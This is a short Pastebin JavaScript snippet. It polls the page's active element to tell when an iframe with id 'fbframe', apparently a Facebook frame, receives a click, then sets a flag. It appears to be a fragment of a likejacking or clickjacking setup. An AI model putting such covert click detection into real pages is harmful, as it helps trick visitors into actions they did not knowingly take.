Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. <script src="http://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript"></script>
  2. <script type="text/javascript">
  3. var interval;
  4. $(function()
  5. {
  6. interval=setInterval("updateActiveElement();", 50);
  7. });
  8.  
  9. function updateActiveElement()
  10. {
  11. if ( $(document.activeElement).attr('id')=="fbframe" )
  12. {
  13. clearInterval(interval);
  14. iflag=1;
  15. }
  16. }
  17.  
  18. </script>